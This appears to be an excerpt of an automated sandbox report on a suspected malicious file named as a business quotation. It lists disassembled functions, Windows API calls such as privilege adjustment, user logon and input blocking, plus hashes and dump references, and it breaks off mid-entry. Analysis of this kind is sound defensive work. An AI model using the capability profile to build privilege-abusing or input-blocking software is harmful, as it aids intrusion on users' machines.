API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: db7e4a3ceb12a9f5adc746c53f182d0acb2f85fa0b1068d64559869a04be1e60
Instruction ID: fc827e94aa7c728ed54955e78b9d1d4d7dfbe76405850805133cbb9b518360d6
Opcode Fuzzy Hash: db7e4a3ceb12a9f5adc746c53f182d0acb2f85fa0b1068d64559869a04be1e60
Instruction Fuzzy Hash: EF41C471504209BFEB20EB95DC85FBBB7FCEB40724F10406BF605A6240EA71AE419B50

Function 0097B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0097B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0097B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0097B655

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 506f23705364d330dc5ae304c6e552bc0aaeb38e229e9e712043ef1ad19214a2
Instruction ID: 43c06eaadefb57e04df30ae7e5a4e9b87f7252ffcd3dee29ae37da0139c8fa5e
Opcode Fuzzy Hash: 506f23705364d330dc5ae304c6e552bc0aaeb38e229e9e712043ef1ad19214a2
Instruction Fuzzy Hash: D7215C35A10118EFCB00EFA5D890BEDBBB8FF88310F1480AAE945EB351DB31A955CB51

Function 00968CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00930FF6: std::exception::exception.LIBCMT ref: 0093102C
Part of subcall function 00930FF6: __CxxThrowException@8.LIBCMT ref: 00931041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00968D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00968D3A
GetLastError.KERNEL32 ref: 00968D47

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 425c8c79a4f061b795f1188e6cca98b693056928f5f4e742be5789afe56e6c40
Instruction ID: e8583f2aae9d67300f2257163775223996258c64cc70748129ff989efbc03a1b
Opcode Fuzzy Hash: 425c8c79a4f061b795f1188e6cca98b693056928f5f4e742be5789afe56e6c40
Instruction Fuzzy Hash: 8E1191B1414209AFD728DF58DC95D6BB7BCFB44710B20862EF45693251EB70AC408A70

Function 00974C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00974C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00974C43
FreeSid.ADVAPI32(?), ref: 00974C53

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 1f29416f7857e7fa1a4c7fdfc405a5d7cc54942ef81692f2a890c07cbd5669f3
Instruction ID: da6a727f3b9571a366b534896302defa2a734ecba5ffef024cac524e6cd7385d
Opcode Fuzzy Hash: 1f29416f7857e7fa1a4c7fdfc405a5d7cc54942ef81692f2a890c07cbd5669f3
Instruction Fuzzy Hash: 07F04975A1130CBFDF04DFF4DC99AAEBBBCEF08301F1044A9A901E2181E7706A049B50

Function 0091E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe80bc925b158338349a3013cb72f218397338e154a09c17368b7e70b28e62f
Instruction ID: 3c01c936d2b7dee2b0ac93fe759e740211df63b27fc427714aa0a5255dc912e9
Opcode Fuzzy Hash: 5fe80bc925b158338349a3013cb72f218397338e154a09c17368b7e70b28e62f
Instruction Fuzzy Hash: 2E229A74A0421ADFDB24DF58C490BEEB7B5FF48300F148469EC66AB391E734A985CB91

Function 0097C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0097C966
FindClose.KERNEL32(00000000), ref: 0097C996

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 03789721907e0357ee142a04e9b8902a7043ed8d59e09c2b93e93630e9839132
Instruction ID: 974ff59e3df628b83b3251a2ef371e0f57abe35906f3e45e06b4a35bec1f8bb6
Opcode Fuzzy Hash: 03789721907e0357ee142a04e9b8902a7043ed8d59e09c2b93e93630e9839132
Instruction Fuzzy Hash: 9F1161726146049FD710EF29D855A6AF7E9FF84324F04891EF9A9D7391DB34AC04CB81

Function 0097A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0098977D,?,0099FB84,?), ref: 0097A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0098977D,?,0099FB84,?), ref: 0097A314

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8366a978a38c8a54457e78d877f027c00f3d9c9bc3cb59a5dfbfd42303836d00
Instruction ID: 5fc55134b88ad8aefe9a74b128c2f6c883f8985f4c5fc3ae3a383e371db981a7
Opcode Fuzzy Hash: 8366a978a38c8a54457e78d877f027c00f3d9c9bc3cb59a5dfbfd42303836d00
Instruction Fuzzy Hash: 0EF0823565822DBBEB119FA4CC49FEEB76DFF08761F008266B919D6181D6309940CBA1

Function 00968713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00968851), ref: 00968728
CloseHandle.KERNEL32(?,?,00968851), ref: 0096873A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: e4872b909adf986dd4e6f3d5b1339916310ec9542a6686bec122d827aeccc6f5
Instruction ID: 4641ce0ae9fd31b521c2acbfe48fc1e6a73b3e2746677e3dfafeec8f029951cf
Opcode Fuzzy Hash: e4872b909adf986dd4e6f3d5b1339916310ec9542a6686bec122d827aeccc6f5
Instruction Fuzzy Hash: 44E0EC76014610EFE7252B64EC09E77BBEDEF44350B24893EF496C0470DB62AC90EB10

Function 0093A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00938F97,?,?,?,00000001), ref: 0093A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0093A3A3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a3ea99dd50205dcb11e7458bc079871e79c5dfc4c99521f37196389bf4c578c3
Instruction ID: 5e34eadf0c5bfbd99b5baf9b7dceae712eafb1c7d4c807dfc4f4535e85088436
Opcode Fuzzy Hash: a3ea99dd50205dcb11e7458bc079871e79c5dfc4c99521f37196389bf4c578c3
Instruction Fuzzy Hash: 8CB09231068208EBCA002BA9EC1AB88BF68EB44BE3F404022F60DC4060CB6654A0AA91

Function 0093F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b8d3adee2110c1df54aec23308a5661114c4fa0bf48ac6418f36961670fc7e
Instruction ID: 6dc655b6310fa0b4128765ae38597befccd279a199a282a66bfbacc9c511aacb
Opcode Fuzzy Hash: 63b8d3adee2110c1df54aec23308a5661114c4fa0bf48ac6418f36961670fc7e
Instruction Fuzzy Hash: 1532F162D69F014DDB239634DC32336A28DAFB73C4F15D737E81AB5AA6EB28C4835540

Function 0094267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e53fa53e9937172916f2fbdbbcd4703c092fbac95bbe07b7dfb5cde7b243de10
Instruction ID: d7181a727daf6c83226a90e3f935854bd1535a535a931206cd5e76314b7caa2c
Opcode Fuzzy Hash: e53fa53e9937172916f2fbdbbcd4703c092fbac95bbe07b7dfb5cde7b243de10
Instruction Fuzzy Hash: DDB1E120D3AF414ED76396398831336BA9CAFBB2D5F91D71BFC1674D22EB2185839181

Function 00978B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00978B25

Part of subcall function 0093543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009791F8,00000000,?,?,?,?,009793A9,00000000,?), ref: 00935443
Part of subcall function 0093543A: __aulldiv.LIBCMT ref: 00935463

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 1cedaf3b88f012959fea60fca3c9312f5c00f2dbe4d39a346e720f19860cf19b
Instruction ID: 519cb62dcf82bce3ac0a93e0d6a6d78b73871b3f9f4063d2c82f20889ad6eb4d
Opcode Fuzzy Hash: 1cedaf3b88f012959fea60fca3c9312f5c00f2dbe4d39a346e720f19860cf19b
Instruction Fuzzy Hash: 7521E4726396108BC729CF65D441B52F3E1EBA4321B288E6DE0F9CB2D0DA34B945DB94

Function 009841FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00984218

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 96a0a4c54e51674d64b052eaa5d36ed6250d0848e959e796bd751fdadfa7230b
Instruction ID: 0b38c2d3b19691354474e43787c8a01287e93756c6b9c369213cf46293d036ce
Opcode Fuzzy Hash: 96a0a4c54e51674d64b052eaa5d36ed6250d0848e959e796bd751fdadfa7230b
Instruction Fuzzy Hash: C0E04F313542199FCB10EF59D854A9AF7ECAF94760F008426FC49C7352DA70F8408BA0

Function 00974EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00974EEC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 3e2285f3b63a5b28a300b5a70d2865761acb1c84952cbe4ccb494c887389fb3f
Instruction ID: a6ef9c9a054c644f29a55386f21012c22b3dfab79ad786f154d15b99d03f2c39
Opcode Fuzzy Hash: 3e2285f3b63a5b28a300b5a70d2865761acb1c84952cbe4ccb494c887389fb3f
Instruction Fuzzy Hash: 05D05E9B1A061479FD184B249C5FF77110CFB00BA2FD0C55AB10AC90C3DAD46C506531

Function 00968C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009688D1), ref: 00968CB3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 75484c1cb689c6640d8ccfaaf2e6145f429d8251661556367c3a3533c6c03938
Instruction ID: 3b15f9a11601c0cdec98ca71fa78e1df8aa18b8f521ea59399c953856b7e0922
Opcode Fuzzy Hash: 75484c1cb689c6640d8ccfaaf2e6145f429d8251661556367c3a3533c6c03938
Instruction Fuzzy Hash: BAD05E3226450EABEF018EA8DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60

Function 00952230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00952242

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 2240675e62a25ccbd0a0d6535176335f7f007186506da7e2d14d0c674cae8256
Instruction ID: c0a2bfcd661f79986cf73f42220f591e042aa7cd5d488b88e05f6ea5456dee97
Opcode Fuzzy Hash: 2240675e62a25ccbd0a0d6535176335f7f007186506da7e2d14d0c674cae8256
Instruction Fuzzy Hash: 9CC048F1814109DBDB05DBA0DA98EEEB7BCAB08305F2044A6A502F2100E7789B489B71

Function 0093A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0093A36A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6721482625f79cecea511d819f59c97362d3962a58e3a0e70c953f06e1c22dd9
Instruction ID: 4402fb37e8dec6e826efcfb493840d8018cd3b4ca03883f16e5ca145a072d199
Opcode Fuzzy Hash: 6721482625f79cecea511d819f59c97362d3962a58e3a0e70c953f06e1c22dd9
Instruction Fuzzy Hash: 78A0123001410CE78A001B55EC05444BF5CD6002D17004021F40C80021873254505580

Function 00928A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2870f8a5a9d7ab6de6d174b0d081da4badee0285a1c27fa593cc2bd8c99800bb
Instruction ID: f81c21346706c21a90bc2758c79cbd2b6e83245f7d109b500e25e9be392c3e51
Opcode Fuzzy Hash: 2870f8a5a9d7ab6de6d174b0d081da4badee0285a1c27fa593cc2bd8c99800bb
Instruction Fuzzy Hash: FB224C30906626CBDF28CF18E4D867FB7A5FF41304F69446AD8828B699DB34DD81DB60

Function 00932405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 76d5bf4bb9b9b36d25064f7a4581a4322148f3a7427916709b04a234e3244407
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: B5C1A43620519309DF2D473AD43403EBBE59EA27B1B1A0B5EE4B3CB5D4EF20D524DA20

Function 0093283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 2b4d2c55f4465452bad29707ad081a9693d898327373bbb2b5b8a959ef7d409c
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 95C1C5362051930ADF2D473A943413EFBE59BA27B171A0B6DE4B2DB5D4EF20D524EA20

Function 00931BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 8279058f0f83d3adad9313f1d822a4cc998f4e1cb8aaee24fc54eb7dba3fefba
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: BAC196362051930ADF6D463AD43403EFBE59EA27B171A1B6DE4B3CB5E4EF20D524DA20

Function 00873630 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

